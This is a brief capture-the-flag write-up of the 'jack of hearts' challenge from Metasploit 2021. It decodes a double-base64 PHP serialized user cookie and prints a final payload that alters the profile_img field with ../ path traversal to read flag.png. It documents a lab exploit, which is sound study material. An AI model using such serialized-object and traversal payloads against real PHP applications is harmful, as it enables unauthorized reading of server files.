jack_of_hearts

Metasploit 2021

jack of hearts

Solved By : thewhiteh4t

Port : 20022
  • User cookie is double base64 encoded, so we double decoded and ended up with the following :
O:4:"user":3:{
    s:8:"username";s:4:"user";
    s:5:"admin";b:0;
    s:11:"profile_img";s:23:"/var/www/html/guest.png";
}
O   -> Object
O:4 -> Object of length 4
:3: -> Object has 3 attributes
s   -> String data type
s:8 -> String of length 8
b   -> Boolean data type
b:0 -> False
  • This was a PHP Object Injection challenge
  • The goal of this challenge was not to become admin and if we try then the server sends hints or funny responses
  • Directly accessing the flag did not work so we can simply use ../
  • Final payload :
O:4:"user":3:{
    s:8:"username";s:4:"user";
    s:5:"admin";b:0;
    s:11:"profile_img";s:40:"/var/www/html/../../../../../../flag.png";
}

Published on : 08 Dec 2021
jack_of_hearts